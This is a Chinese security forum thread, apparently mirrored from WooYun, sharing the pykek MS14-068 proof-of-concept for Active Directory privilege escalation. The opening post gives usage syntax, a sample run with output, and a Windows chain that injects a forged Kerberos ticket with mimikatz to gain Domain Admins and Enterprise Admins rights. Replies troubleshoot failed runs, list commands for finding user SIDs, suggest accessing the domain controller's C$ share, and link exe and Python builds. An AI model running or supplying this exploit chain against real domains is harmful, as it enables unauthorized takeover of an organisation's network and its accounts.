安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WooYun > WooYun-Zone > MS14-068 privilege escalation PoC: 可以让任何域内用户提

MS14-068 privilege escalation PoC: 可以让任何域内用户提

时间:2017-09-07来源: 作者:点击:
网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地
DM_ (http://x0day.me) | 2014-12-05 16:35

https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

USAGE:

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:
    -p <clearPassword>
--rc4 <ntlmHash>
Example usage :

Linux (tested with samba and MIT Kerberos)

//内容来自安云网



[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! //本文来自安云网
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file '[email protected]'... Done! //ANYUN.ORG
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0


On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc //ANYUN.ORG
mimikatz.exe "kerberos::ptc [email protected]" exit`
//安云网咨询系统

分享到:
  1. 1#
    回复此人 感谢
    园长 (喵~) | 2014-12-05 16:41

    看到了 //copyright AnYun.ORG

  2. 2#
    回复此人 感谢
    醉青丝 | 2014-12-05 16:43

    爱你

    //安云网咨询系统

  3. 3#
    回复此人 感谢
    risi | 2014-12-05 16:43

    sid 怎么找呀 ... 话说都在域里了再拿 域管难度不大呀 //安云网咨询系统

  4. 4#
    回复此人 感谢
    DM_ (http://x0day.me) | 2014-12-05 16:44

    @risi //内容来自安云网
    这样不用抓明文,整理,再扫,抓明文。。。
    要是好方法,可以在这里交流啊。 //安云网咨询系统

  5. 5#
    回复此人 感谢
    DM_ (http://x0day.me) | 2014-12-05 16:45

    @risi

    //安云网,anyun.org



    域内不用扫,用查 【邪恶】

    //内容来自AnYun.ORG

  6. 6#
    回复此人 感谢
    if、so | 2014-12-05 16:46

    问题是,这年头谁不打补丁 //本文来自安云网

  7. 7#
    回复此人 感谢
    Mody | 2014-12-05 16:52

    瓦擦,出poc拉

    //内容来自安云网

  8. 8#
    回复此人 感谢
    risi | 2014-12-05 16:53

    @DM_ 恩。 找到方法了, geusid.exe //内容来自安云网
    你们测成功了? //内容来自AnYun.ORG

  9. 9#
    回复此人 感谢
    s0mun5 | 2014-12-05 17:22

    @risi whoami /all

    //安云网,anyun.org

  10. 10#
    回复此人 感谢
    null (生活不会像你想象得那么好,也不会像你想象得那么糟。) | 2014-12-05 17:23

    wmic useraccount where name="USERNAME" get sid

    //内容来自安云网

  11. 11#
    回复此人 感谢
    Chu (学习ing。) | 2014-12-05 17:24

    mark

    //内容来自安云网

  12. 12#
    回复此人 感谢
    null (生活不会像你想象得那么好,也不会像你想象得那么糟。) | 2014-12-05 17:24

    @if、so 这年头,服务器打补丁的少,除了那种IT为导向的企业。

    //内容来自安云网

  13. 13#
    回复此人 感谢
    刘海哥 (‮moc.ghuil.www) | 2014-12-05 19:35

    mark! //内容来自AnYun.ORG

  14. 14#
    回复此人 感谢
    x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2014-12-05 19:36

    mark

    //安云网咨询系统

  15. 15#
    回复此人 感谢
    RainShine (I'm your angel of music.) | 2014-12-05 19:42

    MARK! //安云网咨询系统

  16. 16#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-05 19:52

    mark! //安云网,anyun.org

  17. 17#
    回复此人 感谢
    GuoKer(ZhuLiu) (基友们,一起钻研吧) | 2014-12-05 19:53

    mark! //copyright AnYun.ORG

  18. 18#
    回复此人 感谢
    二狗子 (农村非主流) | 2014-12-05 20:05

    内网杀手啊

    //内容来自AnYun.ORG

  19. 19#
    回复此人 感谢
    Jumbo (www.chinabaiker.com) | 2014-12-05 20:15

    那个512,513啥意思

    //内容来自AnYun.ORG

  20. 20#
    回复此人 感谢
    netwind | 2014-12-05 20:44

    mark

    //内容来自安云网

  21. 21#
    回复此人 感谢
    孤月寒城 (握了棵草) | 2014-12-05 20:57

    我擦。好猛 //安云网咨询系统

  22. 22#
    回复此人 感谢
    帕秋莉 (私は眠りたい wwwww) | 2014-12-05 22:54

    卧槽。 小马哥威武

    //内容来自安云网

  23. 23#
    回复此人 感谢
    Cyrils | 2014-12-05 23:28

    感谢马总!

    //安云网,anyun.org

  24. 24#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-05 23:29

    kerberos::ptc 咪咪卡住提示没有啊。

    //copyright AnYun.ORG

  25. 25#
    回复此人 感谢
    Kuuki | 2014-12-05 23:30

    wow //本文来自安云网

  26. 26# 感谢(1)
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-05 23:52

    测试成功,自己编译的exe版本···mimikatz要去官网下最新的,才有ptc模块···

    //ANYUN.ORG

  27. 27#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-06 00:13

    @Major 感谢。 //内容来自AnYun.ORG

  28. 28#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 00:18

    @_Thorns 你这感谢的方式不对啊···点我右上角感谢啊

    //内容来自AnYun.ORG

  29. 29#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-06 00:33

    @Major 已点。 //copyright AnYun.ORG

  30. 30#
    回复此人 感谢
    luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2014-12-06 08:09

    //安云网,anyun.org

  31. 31#
    回复此人 感谢
    s0mun5 | 2014-12-06 09:13

    @Major cache文件解出来是什么内容?求截图 //ANYUN.ORG

  32. 32#
    回复此人 感谢
    magerx (为什么要去争论。) | 2014-12-06 10:15

    这个牛。 //ANYUN.ORG

  33. 33#
    回复此人 感谢
    My5t3ry | 2014-12-06 11:24

    mark //ANYUN.ORG

  34. 34#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 11:28

    @s0mun5 这个文件不是用来解的··是用来inject的,mimikatz新版有一个ptc模块可以inject kerberos tickets,成功后会显示inject ok!会把当前普通用户加入到域管组,然后利用该session去连接域控···你可以理解成hash注射,但是跟hash注射不一样(友情提示:感谢按钮在右上角)

    //内容来自安云网

  35. 35#
    回复此人 感谢
    屎蛋 | 2014-12-06 11:42

    卡在password不动了,啥也没列出来 蛋疼

    //copyright AnYun.ORG

  36. 36#
    回复此人 感谢
    屎蛋 | 2014-12-06 12:15

    @Major 卡着不动 姿势有问题? Capture.PNG

    //内容来自AnYun.ORG

  37. 37#
    回复此人 感谢
    ramos | 2014-12-06 13:20

    @屎蛋 是不是要输入jack对应的密码?还是可以直接使用 -p参数设置密码? //安云网,anyun.org

  38. 38#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 13:22

    @ramos 要输密码···有-p参数吗?? //copyright AnYun.ORG

  39. 39#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 13:22

    @屎蛋 要输密码···jack密码

    //本文来自安云网

  40. 40#
    回复此人 感谢
    m00zh33 | 2014-12-06 15:19

    jinecting ticket: OK之后,net user m00zh33 /add /domain 直接报 System error 5 has occurred. Access is denied. 因为之前尝试了几次,为什么是access is denied????难道没有成功????@Major //内容来自AnYun.ORG

  41. 41#
    回复此人 感谢
    ramos | 2014-12-06 15:25

    @m00zh33 domain admins组内有你吗? //安云网,anyun.org

  42. 42#
    回复此人 感谢
    m00zh33 | 2014-12-06 15:29

    @ramos,没有,我只控制了一个domain user //安云网,anyun.org

  43. 43#
    回复此人 感谢
    jk_影 | 2014-12-06 15:36

    mimikatz一直注入失败 //安云网,anyun.org

  44. 44#
    回复此人 感谢
    jk_影 | 2014-12-06 15:40

    -s <userSid> 这个是域管理的sid还是当前用户的呢?

    //ANYUN.ORG

  45. 45#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:40

    @m00zh33 你直接dir \\dc\c$  或者直接dir其他机器C$共享 用at试试·· //本文来自安云网

  46. 46#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:40

    @ramos 成功之后Domain Admins组和其他管理员组没有你当前用户···

    //内容来自AnYun.ORG

  47. 47#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:41

    @jk_影 我在win7下成功,在XP下失败

    //安云网,anyun.org

  48. 48#
    回复此人 感谢
    jk_影 | 2014-12-06 15:49

    @Major -s <userSid> 这个是当前用户的sid还是域管理的id 03测试能生成[email protected]这个文件 但是mimikatz ptc模块inject 一直error

    //内容来自安云网

  49. 49#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:56

    @jk_影 你当前用户的sid啊··· //安云网,anyun.org

  50. 50#
    回复此人 感谢
    jk_影 | 2014-12-06 16:06

    @Major 你成功提权到域管了吗?

    //内容来自安云网

  51. 51#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 16:20

    @jk_影 嗯啊··· //内容来自安云网

  52. 52#
    回复此人 感谢
    jk_影 | 2014-12-06 16:24

    @Major 新版本的mimikatz可以发一个出来吗我一直是在注入失败

    //安云网咨询系统

  53. 53#
    回复此人 感谢
    dmst | 2014-12-06 18:11

    mark!!!

    //本文来自安云网

  54. 54#
    回复此人 感谢
    0xTback | 2014-12-07 01:46

    mark //安云网咨询系统

  55. 55#
    回复此人 感谢
    m00zh33 | 2014-12-07 13:39

    @Major dir \\dc\c$ 报Access is denied,其他域内机器也都是一样的access is denied。客户端是win7,域控可能是2008的。inject 都是ok的。 //ANYUN.ORG

  56. 56#
    回复此人 感谢
    jk_影 | 2014-12-07 18:43

    @m00zh33 我昨天测试也是这样感觉还有什么东西没弄

    //copyright AnYun.ORG

  57. 57#
    回复此人 感谢
    GuoKer(ZhuLiu) (基友们,一起钻研吧) | 2014-12-07 19:02

    @Major 2003和xp测试不成功吗?

    //安云网,anyun.org

  58. 58#
    回复此人 感谢
    l137 (有些事情不是你不去看,它就没了的) | 2014-12-08 09:53

    我出了个pyasn1.error.PyAsn1Error: TagSet的错误 //内容来自安云网

  59. 59#
    回复此人 感谢
    灰色轨迹 | 2014-12-08 13:21

    @Major 如何测试成功的

    //ANYUN.ORG

  60. 60#
    回复此人 感谢
    带我玩 | 2014-12-08 13:53

    表示没玩懂

    //内容来自AnYun.ORG

  61. 61#
    回复此人 感谢
    灰色轨迹 | 2014-12-08 16:08

    @Major inject 都是ok的。 结果

    //本文来自安云网

    dir \\dc\c$ 报Access is denied  都同样 换别的机器也是一样 求原因 求解决方案 //ANYUN.ORG

  62. 62#
    回复此人 感谢
    m00zh33 | 2014-12-08 17:01

    @灰色轨迹,遇到一样的问题,客户端是win7,域控可能是server2008的 //安云网,anyun.org

  63. 63#
    回复此人 感谢
    beastk | 2014-12-08 17:42

    File "kek\krb5.pyc" //内容来自AnYun.ORG
    有没有出现过这个问题

    //内容来自安云网

  64. 64#
    回复此人 感谢
    jk_影 | 2014-12-09 11:40

    @m00zh33 土司有人说要用本地账户登录 然后在注入 不要用域内普通账户

    //安云网咨询系统

  65. 65#
    回复此人 感谢
    beastk | 2014-12-09 14:57

    @jk_影 ?本地账户?

    //内容来自AnYun.ORG

    有些环境本地帐户是无法访问到域内资源的

    //copyright AnYun.ORG

  66. 66#
    回复此人 感谢
    jk_影 | 2014-12-09 15:11

    @beastk 我测试过了只要机器加入域内 用本地administrator 可以成功 关键在于session

    //安云网咨询系统

    这个说的很清楚了http://www.secpulse.com/archives/2874.html

    //内容来自安云网

  67. 67#
    回复此人 感谢
    nony (Not do is die...) | 2014-12-12 21:30

    EXE版本点击此处下载:ms14-068.exe //安云网,anyun.org


    py版本下载:MS14-068.py

    //安云网咨询系统

  68. 68#
    回复此人 感谢
    Lee Swagger (one) | 2014-12-15 00:12

    Sony的域服务器

    //内容来自安云网

  69. 69#
    回复此人 感谢
    V-King (解决问题必有感谢,别问我是不是土豪(穷diao一个) | 2014-12-19 21:25

    socket.error: [Errno 10061]  提示这个   百度了下好像是远程拒绝   但是不知道怎么解决 //内容来自安云网

  70. 70#
    回复此人 感谢
    hack2012 (www.waitalone.cn) | 2015-10-21 13:58

    win7 client+domain 2008 没有测试成功,为何? //安云网咨询系统

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容